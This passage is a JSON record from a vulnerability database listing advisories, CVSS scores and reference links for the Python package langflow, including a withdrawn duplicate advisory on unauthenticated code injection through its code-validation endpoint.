"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/issues/12345" }, { "reference_url": "https://github.com/langflow-ai/langflow/pull/12160", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/pull/12160" }, { "reference_url": "https://github.com/langflow-ai/langflow/releases/tag/1.8.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/releases/tag/1.8.2" }, { "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Act", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-26T03:55:25Z/" } ], "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx" }, { "reference_url": "https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33017", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33017" }, { "reference_url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017" }, { "reference_url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017" }, { "reference_url": "https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours" }, { "reference_url": "https://github.com/advisories/GHSA-rvqx-wpfh-mfx7", "reference_id": "GHSA-rvqx-wpfh-mfx7", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Act", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-26T03:55:25Z/" } ], "url": "https://github.com/advisories/GHSA-rvqx-wpfh-mfx7" }, { "reference_url": "https://github.com/advisories/GHSA-vwmf-pq79-vjvx", "reference_id": "GHSA-vwmf-pq79-vjvx", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-vwmf-pq79-vjvx" } ], "fixed_packages": [], "aliases": [ "CVE-2026-33017", "GHSA-vwmf-pq79-vjvx" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zqwj-45w7-7kft" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/57082?format=api", "vulnerability_id": "VCID-ztx2-wefa-c7bk", "summary": "Duplicate Advisory: Langflow Vulnerable to Code Injection via the `/api/v1/validate/code` endpoint\n### Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-rvqx-wpfh-mfx7. This link is maintained to preserve external references.\n\n### Original Description\n\nLangflow versions prior to 1.3.0 are susceptible to code injection in the `/api/v1/validate/code` endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.", "references": [ { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/pull/6911", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/pull/6911" }, { "reference_url": "https://github.com/langflow-ai/langflow/releases/tag/1.3.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/releases/tag/1.3.0" }, { "reference_url": "https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3248", "reference_id": "CVE-2025-3248", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3248" }, { "reference_url": "https://github.com/advisories/GHSA-c995-4fw3-j39m", "reference_id": "GHSA-c995-4fw3-j39m", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-c995-4fw3-j39m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/44832?format=api", "purl": "pkg:pypi/langflow@1.3.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1dek-kvzf-27d1" }, { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-bb6r-1f6u-t7ed" }, { "vulnerability": "VCID-fc5h-qc2t-xqc3" }, { "vulnerability": "VCID-ncvf-vzqr-uydz" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-qwtw-q92t-quhz" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-rrva-95s5-kbcf" }, { "vulnerability": "VCID-sbea-kkfu-akgb" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-ysnc-jyxb-6qcy" }, { "vulnerability": "VCID-zqwj-45w7-7kft" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.3.0" } ], "aliases": [ "GHSA-c995-4fw3-j39m" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ztx2-wefa-c7bk" } ], "fixing_vulnerabilities": [], "risk_score": "10.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@0.1.0" }